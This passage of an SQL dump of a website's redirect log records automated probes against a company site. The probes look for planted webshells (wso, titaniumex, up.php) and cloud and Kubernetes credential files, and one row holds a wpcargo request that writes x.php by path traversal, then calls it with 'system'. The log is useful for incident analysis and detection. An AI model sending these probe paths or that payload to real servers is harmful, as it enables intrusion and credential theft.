00:00:00',301),(49547,'http://3s-technologies.com.tr/en/core.php',NULL,'https://www.yahoo.com/','',10,0,'2025-11-20 14:28:36','0000-00-00 00:00:00',301),(49548,'http://3s-technologies.com.tr/en/elp.php',NULL,'https://duckduckgo.com/','',69,0,'2025-11-20 14:28:37','0000-00-00 00:00:00',301),(49549,'http://3s-technologies.com.tr/en/wp-content/plugins/wpsearch/login.php',NULL,'https://www.bing.com/','',1,0,'2025-11-20 14:28:41','0000-00-00 00:00:00',301),(49550,'http://3s-technologies.com.tr/en/akc.php?p=',NULL,'https://www.google.co.uk/','',1,0,'2025-11-20 14:28:51','0000-00-00 00:00:00',301),(49551,'http://3s-technologies.com.tr/en/app/webroot/filemanager.php?p=',NULL,'https://www.yahoo.com/','',1,0,'2025-11-20 14:28:53','0000-00-00 00:00:00',301),(49552,'http://3s-technologies.com.tr/en/atomlib.php',NULL,'https://duckduckgo.com/','',41,0,'2025-11-20 14:28:55','0000-00-00 00:00:00',301),(49553,'http://3s-technologies.com.tr/en/dropdown.php?p=',NULL,'https://www.google.com/','',1,0,'2025-11-20 14:29:02','0000-00-00 00:00:00',301),(49554,'http://3s-technologies.com.tr/en/item.php',NULL,'https://www.yahoo.com/','',40,0,'2025-11-20 14:29:05','0000-00-00 00:00:00',301),(49555,'http://3s-technologies.com.tr/en/makeasmtp.php?p=',NULL,'https://www.bing.com/','',1,0,'2025-11-20 14:29:07','0000-00-00 00:00:00',301),(49556,'http://3s-technologies.com.tr/en/wp-content/uploads/class.api.php',NULL,'https://www.google.fr/','',4,0,'2025-11-20 14:29:08','0000-00-00 00:00:00',301),(49557,'http://3s-technologies.com.tr/en/ds.php',NULL,'https://www.google.fr/','',19,0,'2025-11-20 14:29:10','0000-00-00 00:00:00',301),(49558,'http://3s-technologies.com.tr/en/f5.php',NULL,'https://www.google.fr/','',5,0,'2025-11-20 14:30:04','0000-00-00 00:00:00',301),(49559,'http://3s-technologies.com.tr/en/dropdown.php',NULL,'https://www.bing.com/','',61,0,'2025-11-20 14:30:09','0000-00-00 00:00:00',301),(49560,'http://3s-technologies.com.tr/en/makeasmtp.php',NULL,'https://www.yahoo.com/','',19,0,'2025-11-20 14:30:10','0000-00-00 00:00:00',301),(49561,'http://3s-technologies.com.tr/en/wp-sigunq.php',NULL,'https://www.yahoo.com/','',2,0,'2025-11-20 14:30:11','0000-00-00 00:00:00',301),(49562,'http://3s-technologies.com.tr/en/alfanew.php',NULL,'https://www.bing.com/','',6,0,'2025-11-20 14:30:13','0000-00-00 00:00:00',301),(49563,'http://3s-technologies.com.tr/en/classsmtps.php',NULL,'https://www.google.com/','',7,0,'2025-11-20 14:30:23','0000-00-00 00:00:00',301),(49564,'http://3s-technologies.com.tr/en/plugins.php',NULL,'https://www.google.com/','',5,0,'2025-11-20 14:30:33','0000-00-00 00:00:00',301),(49565,'http://3s-technologies.com.tr/en/post.php',NULL,'https://www.bing.com/','',8,0,'2025-11-20 14:30:35','0000-00-00 00:00:00',301),(49566,'http://3s-technologies.com.tr/en/hoot.php',NULL,'https://www.yahoo.com/','',4,0,'2025-11-20 14:30:39','0000-00-00 00:00:00',301),(49567,'http://3s-technologies.com.tr/en/log.php',NULL,'https://www.google.com/','',18,0,'2025-11-20 14:30:41','0000-00-00 00:00:00',301),(49568,'http://3s-technologies.com.tr/en/mail.php',NULL,'https://www.google.fr/','',4,0,'2025-11-20 14:30:42','0000-00-00 00:00:00',301),(49569,'http://3s-technologies.com.tr/en/bak.php',NULL,'https://www.google.com/','',8,0,'2025-11-20 14:30:43','0000-00-00 00:00:00',301),(49570,'http://3s-technologies.com.tr/en/upfile.php',NULL,'https://www.google.de/','',4,0,'2025-11-20 14:30:45','0000-00-00 00:00:00',301),(49571,'http://3s-technologies.com.tr/en/updates.php',NULL,'https://www.bing.com/','',6,0,'2025-11-20 14:30:49','0000-00-00 00:00:00',301),(49572,'http://3s-technologies.com.tr/en/ae.php',NULL,'https://www.google.fr/','',5,0,'2025-11-20 14:30:52','0000-00-00 00:00:00',301),(49573,'http://3s-technologies.com.tr/en/ini.php',NULL,'https://www.bing.com/','',10,0,'2025-11-20 14:30:55','0000-00-00 00:00:00',301),(49574,'http://3s-technologies.com.tr/en/123.php',NULL,'https://www.yahoo.com/','',8,0,'2025-11-20 14:31:01','0000-00-00 00:00:00',301),(49575,'http://3s-technologies.com.tr/en/admin-ajax.php',NULL,'https://duckduckgo.com/','',4,0,'2025-11-20 14:31:03','0000-00-00 00:00:00',301),(49576,'http://3s-technologies.com.tr/en/akc.php',NULL,'https://www.google.com/','',24,0,'2025-11-20 14:31:04','0000-00-00 00:00:00',301),(49577,'http://3s-technologies.com.tr/en/asd.php',NULL,'https://duckduckgo.com/','',23,0,'2025-11-20 14:31:05','0000-00-00 00:00:00',301),(49578,'http://3s-technologies.com.tr/en/axx.php',NULL,'https://duckduckgo.com/','',6,0,'2025-11-20 14:31:06','0000-00-00 00:00:00',301),(49579,'http://3s-technologies.com.tr/en/berax.php',NULL,'https://www.yahoo.com/','',5,0,'2025-11-20 14:31:07','0000-00-00 00:00:00',301),(49580,'http://3s-technologies.com.tr/en/checkbox.php',NULL,'https://www.google.de/','',5,0,'2025-11-20 14:31:08','0000-00-00 00:00:00',301),(49581,'http://3s-technologies.com.tr/en/file4.php',NULL,'https://www.bing.com/','',12,0,'2025-11-20 14:31:10','0000-00-00 00:00:00',301),(49582,'http://3s-technologies.com.tr/tr/wp-includes/cs.php',NULL,'','',2,0,'2025-11-20 15:12:36','0000-00-00 00:00:00',301),(49583,'http://3s-technologies.com.tr/tr/wp-includes/css/kses.php',NULL,'','',2,0,'2025-11-20 15:12:38','0000-00-00 00:00:00',301),(49584,'http://3s-technologies.com.tr/tr/jagoan.php',NULL,'','',2,0,'2025-11-20 15:12:39','0000-00-00 00:00:00',301),(49585,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/myip.php',NULL,'','',2,0,'2025-11-20 15:12:40','0000-00-00 00:00:00',301),(49586,'http://3s-technologies.com.tr/tr/cok.php',NULL,'','',4,0,'2025-11-20 15:12:41','0000-00-00 00:00:00',301),(49587,'http://3s-technologies.com.tr/tr/w1w.php',NULL,'','',3,0,'2025-11-20 15:12:44','0000-00-00 00:00:00',301),(49588,'http://3s-technologies.com.tr/tr/cafe.php',NULL,'','',6,0,'2025-11-20 15:12:45','0000-00-00 00:00:00',301),(49589,'http://3s-technologies.com.tr/tr/ww2.php',NULL,'','',10,0,'2025-11-20 15:12:45','0000-00-00 00:00:00',301),(49590,'http://3s-technologies.com.tr/tr/ww3.php',NULL,'','',10,0,'2025-11-20 15:12:46','0000-00-00 00:00:00',301),(49591,'http://3s-technologies.com.tr/tr/ww4.php',NULL,'','',5,0,'2025-11-20 15:12:46','0000-00-00 00:00:00',301),(49592,'http://3s-technologies.com.tr/tr/ww5.php',NULL,'','',8,0,'2025-11-20 15:13:59','0000-00-00 00:00:00',301),(49593,'https://3s-technologies.com.tr/tr/docker-compose.yml',NULL,'','',3,0,'2025-11-21 09:04:31','0000-00-00 00:00:00',301),(49594,'https://3s-technologies.com.tr/tr/credentials',NULL,'','',3,0,'2025-11-21 09:04:32','0000-00-00 00:00:00',301),(49595,'https://3s-technologies.com.tr/tr/.aws/config',NULL,'','',9,0,'2025-11-21 09:04:32','0000-00-00 00:00:00',301),(49596,'https://3s-technologies.com.tr/tr/actuator/env',NULL,'','',5,0,'2025-11-21 09:04:33','0000-00-00 00:00:00',301),(49597,'https://3s-technologies.com.tr/tr/.kube/config',NULL,'','',3,0,'2025-11-21 09:04:34','0000-00-00 00:00:00',301),(49598,'http://3s-technologies.com.tr/tr/x50.php',NULL,'','',30,0,'2025-11-21 10:25:04','0000-00-00 00:00:00',301),(49599,'http://3s-technologies.com.tr/tr/wp-wlx.php',NULL,'','',7,0,'2025-11-21 10:25:05','0000-00-00 00:00:00',301),(49600,'https://3s-technologies.com.tr/wp-confiq.php',NULL,'','',1,0,'2025-11-21 13:46:42','0000-00-00 00:00:00',301),(49601,'http://3s-technologies.com.tr/wp-confiq.php',NULL,'','',18,0,'2025-11-21 13:47:12','0000-00-00 00:00:00',301),(49602,'http://3s-technologies.com.tr/en/wp-content/uploads/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:17','0000-00-00 00:00:00',301),(49603,'http://3s-technologies.com.tr/wp-content/plugins/apikey/apikey.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:20','0000-00-00 00:00:00',301),(49604,'http://3s-technologies.com.tr/en/wp-content/plugins/apikey/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:21','0000-00-00 00:00:00',301),(49605,'http://3s-technologies.com.tr/en/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:22','0000-00-00 00:00:00',301),(49606,'http://3s-technologies.com.tr/wp-content/x.php?1=system',NULL,'www.google.com','',1,0,'2025-11-21 19:44:22','0000-00-00 00:00:00',301),(49607,'http://3s-technologies.com.tr/en/wp-content/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:23','0000-00-00 00:00:00',301),(49608,'http://3s-technologies.com.tr/en/wp-content/uploads/mfw-activity-logger/csv-uploads/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:25','0000-00-00 00:00:00',301),(49609,'http://3s-technologies.com.tr/wp-content/plugins/contact-form-7/admin/edit-contact-form.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:28','0000-00-00 00:00:00',301),(49610,'http://3s-technologies.com.tr/en/wp-content/plugins/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:29','0000-00-00 00:00:00',301),(49611,'http://3s-technologies.com.tr/en/wp-content/uploads/p3d/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:30','0000-00-00 00:00:00',301),(49612,'http://3s-technologies.com.tr/en/wp-content/plugins/background-image-cropper/ups.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:34','0000-00-00 00:00:00',301),(49613,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:35','0000-00-00 00:00:00',301),(49614,'http://3s-technologies.com.tr/en/wp-content/themes/wp-pridmag/init.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:36','0000-00-00 00:00:00',301),(49615,'http://3s-technologies.com.tr/en/wp-includes/id3/wp-conflg.php',NULL,'www.google.com','',3,0,'2025-11-21 19:44:48','0000-00-00 00:00:00',301),(49616,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-upload/roobots.php',NULL,'www.google.com','',3,0,'2025-11-21 19:44:51','0000-00-00 00:00:00',301),(49617,'http://3s-technologies.com.tr/wp-content/plugins/xwp/up.php',NULL,'','',1,0,'2025-11-21 19:44:52','0000-00-00 00:00:00',301),(49618,'http://3s-technologies.com.tr/en/wp-content/plugins/xwp/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:53','0000-00-00 00:00:00',301),(49619,'http://3s-technologies.com.tr/en/wso123.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:54','0000-00-00 00:00:00',301),(49620,'http://3s-technologies.com.tr/wp-content/plugins/ccx/index.php',NULL,'','',1,0,'2025-11-21 19:44:54','0000-00-00 00:00:00',301),(49621,'http://3s-technologies.com.tr/en/wp-content/plugins/ccx/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:44:55','0000-00-00 00:00:00',301),(49622,'http://3s-technologies.com.tr/ccx/index.php',NULL,'','',2,0,'2025-11-21 19:44:56','0000-00-00 00:00:00',301),(49623,'http://3s-technologies.com.tr/en/ccx/titaniumex.php?titanium=ex',NULL,'www.google.com','',2,0,'2025-11-21 19:44:57','0000-00-00 00:00:00',301),(49624,'http://3s-technologies.com.tr/en/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'www.google.com','',1,0,'2025-11-21 19:44:58','0000-00-00 00:00:00',301),(49625,'http://3s-technologies.com.tr/en/wp-content/plugins/index.php?0day=spamworldpro',NULL,'www.google.com','',1,0,'2025-11-21 19:44:59','0000-00-00 00:00:00',301),(49626,'http://3s-technologies.com.tr/en/spamworldsec.php?0day=spamworldpro',NULL,'www.google.com','',1,0,'2025-11-21 19:45:01','0000-00-00 00:00:00',301),(49627,'http://3s-technologies.com.tr/en/wp-content/uploads/settingsimages/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:45:04','0000-00-00 00:00:00',301),(49628,'http://3s-technologies.com.tr/en/wp-content/plugins/indeed-membership-pro/classes/paymentgateways/mollie/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:05','0000-00-00 00:00:00',301),(49629,'http://3s-technologies.com.tr/en/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:45:06','0000-00-00 00:00:00',301),(49630,'http://3s-technologies.com.tr/en/wp-includes/class-index-wordpress.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:08','0000-00-00 00:00:00',301),(49631,'http://3s-technologies.com.tr/en/wp-includes/class-wordpress-license.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:10','0000-00-00 00:00:00',301),(49632,'http://3s-technologies.com.tr/en/wp-includes/class-wp-page-icon.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:11','0000-00-00 00:00:00',301),(49633,'http://3s-technologies.com.tr/en/wp-includes/wp-system-cloud.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:12','0000-00-00 00:00:00',301),(49634,'http://3s-technologies.com.tr/en/wp-content/_input_3_titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:45:24','0000-00-00 00:00:00',301),(49635,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/lib/files/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:45:26','0000-00-00 00:00:00',301),(49636,'http://3s-technologies.com.tr/en/wp-content/plugins/upload/up.php',NULL,'www.google.com','',2,0,'2025-11-21 19:45:27','0000-00-00 00:00:00',301),(49637,'http://3s-technologies.com.tr/en/wp-includes/simplepie/iri-stream.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:29','0000-00-00 00:00:00',301),(49638,'http://3s-technologies.com.tr/en/wp-content/plugins/simple-google-recaptcha/recaptcha.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:32','0000-00-00 00:00:00',301),(49639,'http://3s-technologies.com.tr/en/titaniumex.php4?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:45:34','0000-00-00 00:00:00',301),(49640,'http://3s-technologies.com.tr/en/wp-content/themes/astra/mar.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:34','0000-00-00 00:00:00',301),(49641,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/wp-aespa.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:35','0000-00-00 00:00:00',301),(49642,'http://3s-technologies.com.tr/en/wp-content/themes/mtheme-unus/css/css.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:36','0000-00-00 00:00:00',301),(49643,'http://3s-technologies.com.tr/en/wp-content/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:37','0000-00-00 00:00:00',301),(49644,'http://3s-technologies.com.tr/en/wp-content/themes/fiestaresidences/download.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:39','0000-00-00 00:00:00',301),(49645,'http://3s-technologies.com.tr/en/wp-content/themes/konzept/includes/uploadify/upload.php',NULL,'www.google.com','',2,0,'2025-11-21 19:45:39','0000-00-00 00:00:00',301),(49646,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/lib/php/1975.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:40','0000-00-00 00:00:00',301),(49647,'http://3s-technologies.com.tr/en/wp-content/plugins/dos2unix/dos2unix.php',NULL,'www.google.com','',3,0,'2025-11-21 19:45:42','0000-00-00 00:00:00',301),(49648,'http://3s-technologies.com.tr/en/wp-content/plugins/wpyii2/wpyii2.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:43','0000-00-00 00:00:00',301),(49649,'http://3s-technologies.com.tr/en/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:43','0000-00-00 00:00:00',301),(49650,'http://3s-technologies.com.tr/en/wp-includes/class-wp-metadata-lazyloader-ajax.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:44','0000-00-00 00:00:00',301),(49651,'http://3s-technologies.com.tr/en/wp-includes/id3/license.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:46','0000-00-00 00:00:00',301),(49652,'http://3s-technologies.com.tr/en/wp-content/plugins/zero7.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:48','0000-00-00 00:00:00',301),(49653,'http://3s-technologies.com.tr/en/wp-content/plugins/uploads/up1.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:49','0000-00-00 00:00:00',301),(49654,'http://3s-technologies.com.tr/en/wp-content/plugins/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:50','0000-00-00 00:00:00',301),(49655,'http://3s-technologies.com.tr/en/wp-content/666.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:52','0000-00-00 00:00:00',301),(49656,'http://3s-technologies.com.tr/en/wp-content/y7.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:53','0000-00-00 00:00:00',301),(49657,'http://3s-technologies.com.tr/en/wp-content/plugins/uploads/ups.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:54','0000-00-00 00:00:00',301),(49658,'http://3s-technologies.com.tr/en/wp-content/plugins/shell20211018.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:55','0000-00-00 00:00:00',301),(49659,'http://3s-technologies.com.tr/en/upspy.php',NULL,'www.google.com','',1,0,'2025-11-21 19:45:56','0000-00-00 00:00:00',301),(49660,'http://3s-technologies.com.tr/en/wp-content/uploads/1234.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:01','0000-00-00 00:00:00',301),(49661,'http://3s-technologies.com.tr/en/shellx.php',NULL,'www.google.com','',3,0,'2025-11-21 19:46:03','0000-00-00 00:00:00',301),(49662,'http://3s-technologies.com.tr/en/123x.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:06','0000-00-00 00:00:00',301),(49663,'http://3s-technologies.com.tr/en/wp-content/king.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:10','0000-00-00 00:00:00',301),(49664,'http://3s-technologies.com.tr/en/wp-content/plugins/ioptimizations/ioptimizes.php?f=f',NULL,'www.google.com','',1,0,'2025-11-21 19:46:12','0000-00-00 00:00:00',301),(49665,'http://3s-technologies.com.tr/en/wp-includes/id3/getid.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:14','0000-00-00 00:00:00',301),(49666,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/disqus.php',NULL,'www.google.com','',3,0,'2025-11-21 19:46:15','0000-00-00 00:00:00',301),(49667,'http://3s-technologies.com.tr/en/wp-content/verified.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:16','0000-00-00 00:00:00',301),(49668,'http://3s-technologies.com.tr/en/wp-content/uploadxx/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:17','0000-00-00 00:00:00',301),(49669,'http://3s-technologies.com.tr/en/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:18','0000-00-00 00:00:00',301),(49670,'http://3s-technologies.com.tr/en/wp-content/verify.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:19','0000-00-00 00:00:00',301),(49671,'http://3s-technologies.com.tr/en/wp-content/admin_shell.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:21','0000-00-00 00:00:00',301),(49672,'http://3s-technologies.com.tr/wp-content/plugins/buddypress-media/app/helper/rtuploadattachment.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:21','0000-00-00 00:00:00',301),(49673,'http://3s-technologies.com.tr/en/wp-content/uploads/rtmedia/tmp/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:46:22','0000-00-00 00:00:00',301),(49674,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll/data.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:24','0000-00-00 00:00:00',301),(49675,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:25','0000-00-00 00:00:00',301),(49676,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll-1/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:26','0000-00-00 00:00:00',301),(49677,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll-2/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:27','0000-00-00 00:00:00',301),(49678,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:28','0000-00-00 00:00:00',301),(49679,'http://3s-technologies.com.tr/en/izo.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:29','0000-00-00 00:00:00',301),(49680,'http://3s-technologies.com.tr/en/spamshell.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:31','0000-00-00 00:00:00',301),(49681,'http://3s-technologies.com.tr/en/execute.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:32','0000-00-00 00:00:00',301),(49682,'http://3s-technologies.com.tr/en/home.php?xsec=team',NULL,'www.google.com','',1,0,'2025-11-21 19:46:36','0000-00-00 00:00:00',301),(49683,'http://3s-technologies.com.tr/en/wp-includes/home.php?xsec=team',NULL,'www.google.com','',1,0,'2025-11-21 19:46:37','0000-00-00 00:00:00',301),(49684,'http://3s-technologies.com.tr/en/wp-content/home.php?xsec=team',NULL,'www.google.com','',1,0,'2025-11-21 19:46:38','0000-00-00 00:00:00',301),(49685,'http://3s-technologies.com.tr/en/wp-admin/home.php?xsec=team',NULL,'www.google.com','',1,0,'2025-11-21 19:46:39','0000-00-00 00:00:00',301),(49686,'http://3s-technologies.com.tr/en/wp-content/plugins/core-stab/wso.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:40','0000-00-00 00:00:00',301),(49687,'http://3s-technologies.com.tr/en/wp-content/plugins/core-stab/fmanager.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:41','0000-00-00 00:00:00',301),(49688,'http://3s-technologies.com.tr/en/wp-content/plugins/core-stab/casper.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:43','0000-00-00 00:00:00',301),(49689,'http://3s-technologies.com.tr/en/uploads/uber_uploader_file.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:45','0000-00-00 00:00:00',301),(49690,'http://3s-technologies.com.tr/en/uber_uploader_file.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:46','0000-00-00 00:00:00',301),(49691,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/log/caspersecurity.php?f=f',NULL,'www.google.com','',1,0,'2025-11-21 19:46:47','0000-00-00 00:00:00',301),(49692,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/files/flash.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:48','0000-00-00 00:00:00',301),(49693,'http://3s-technologies.com.tr/en/flash.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:49','0000-00-00 00:00:00',301),(49694,'http://3s-technologies.com.tr/en/wp-content/h76d3.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:50','0000-00-00 00:00:00',301),(49695,'http://3s-technologies.com.tr/en/class.php',NULL,'www.google.com','',32,0,'2025-11-21 19:46:53','0000-00-00 00:00:00',301),(49696,'http://3s-technologies.com.tr/en/wp-shell.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:54','0000-00-00 00:00:00',301),(49697,'http://3s-technologies.com.tr/en/wp-content/fox.php',NULL,'www.google.com','',3,0,'2025-11-21 19:46:55','0000-00-00 00:00:00',301),(49698,'http://3s-technologies.com.tr/en/0iq.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:57','0000-00-00 00:00:00',301),(49699,'http://3s-technologies.com.tr/en/wp-content/0iq.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:58','0000-00-00 00:00:00',301),(49700,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll-1/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:46:59','0000-00-00 00:00:00',301),(49701,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:00','0000-00-00 00:00:00',301),(49702,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll-1/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:01','0000-00-00 00:00:00',301),(49703,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll-2/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:02','0000-00-00 00:00:00',301),(49704,'http://3s-technologies.com.tr/wp-content/plugins/wordpress3cll/up.php',NULL,'','',1,0,'2025-11-21 19:47:02','0000-00-00 00:00:00',301),(49705,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:03','0000-00-00 00:00:00',301),(49706,'http://3s-technologies.com.tr/wp-content/plugins/wordpress3cll-1/up.php',NULL,'','',1,0,'2025-11-21 19:47:04','0000-00-00 00:00:00',301),(49707,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll-1/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:05','0000-00-00 00:00:00',301),(49708,'http://3s-technologies.com.tr/wp-content/plugins/wordpresss3cll-1/up.php',NULL,'','',1,0,'2025-11-21 19:47:06','0000-00-00 00:00:00',301),(49709,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll-1/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:07','0000-00-00 00:00:00',301),(49710,'http://3s-technologies.com.tr/wp-content/plugins/wordpressh3ll/up.php',NULL,'','',1,0,'2025-11-21 19:47:08','0000-00-00 00:00:00',301),(49711,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:09','0000-00-00 00:00:00',301),(49712,'http://3s-technologies.com.tr/wp-content/plugins/wordpressh3ll-1/up.php',NULL,'','',1,0,'2025-11-21 19:47:09','0000-00-00 00:00:00',301),(49713,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll-1/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:10','0000-00-00 00:00:00',301),(49714,'http://3s-technologies.com.tr/wp-content/plugins/wordpressh3ll-2/up.php',NULL,'','',1,0,'2025-11-21 19:47:11','0000-00-00 00:00:00',301),(49715,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpressh3ll-2/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:12','0000-00-00 00:00:00',301),(49716,'http://3s-technologies.com.tr/wp-content/plugins/wordpresssh3ll/up.php',NULL,'','',1,0,'2025-11-21 19:47:13','0000-00-00 00:00:00',301),(49717,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:14','0000-00-00 00:00:00',301),(49718,'http://3s-technologies.com.tr/wp-content/plugins/wordpresssh3ll-1/up.php',NULL,'','',1,0,'2025-11-21 19:47:14','0000-00-00 00:00:00',301),(49719,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll-1/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:16','0000-00-00 00:00:00',301),(49720,'http://3s-technologies.com.tr/wp-content/plugins/wordpresssh3ll-2/up.php',NULL,'','',1,0,'2025-11-21 19:47:16','0000-00-00 00:00:00',301),(49721,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresssh3ll-2/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:17','0000-00-00 00:00:00',301),(49722,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress3cll-1/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:19','0000-00-00 00:00:00',301),(49723,'http://3s-technologies.com.tr/wp-content/plugins/wordpresss3cll/up.php',NULL,'','',1,0,'2025-11-21 19:47:20','0000-00-00 00:00:00',301),(49724,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll/titaniumex.php?titanium=ex',NULL,'www.google.com','',1,0,'2025-11-21 19:47:21','0000-00-00 00:00:00',301),(49725,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll-2/up.php',NULL,'www.google.com','',1,0,'2025-11-21 19:47:22','0000-00-00 